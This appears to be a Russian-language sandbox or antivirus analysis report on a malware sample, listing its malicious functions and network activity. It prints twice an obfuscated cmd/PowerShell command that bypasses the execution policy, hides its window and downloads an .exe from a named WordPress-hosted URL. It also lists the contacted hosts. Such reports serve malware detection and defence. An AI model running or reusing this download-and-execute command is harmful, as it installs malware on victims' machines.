Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://lettersforplay.com/wp-content/uploads/velaeb7x/qobwt9b7.exe как %appdata%.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c "p^OW^ErsHel^L.Ex^e -exE^cU^TiOnp^OliCy B^YpAS^s -^nOp^roF^i^L^E ^-w^INdO^WstylE^ hIDdEn (NE^W-^objeCt SyStem^.^net.wEbC^lI^e^Nt).dOwnL^oad^F^iLE('http://lettersforplay.com...
Сетевая активность
Подключается к
- 'le####sforplay.com':80
TCP
Запросы HTTP GET
- http://le####sforplay.com/wp-content/uploads/velAeb7X/qoBWT9b7.exe
- http://le####sforplay.com/
- http://ww#.###tersforplay.com/
UDP
- DNS ASK le####sforplay.com
- DNS ASK ww#.###tersforplay.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c "p^OW^ErsHel^L.Ex^e -exE^cU^TiOnp^OliCy B^YpAS^s -^nOp^roF^i^L^E ^-w^INdO^WstylE^ hIDdEn (NE^W-^objeCt SyStem^.^net.wEbC^lI^e^Nt).dOwnL^oad^F^iLE('http://lettersforplay.com...' (со скрытым окном)
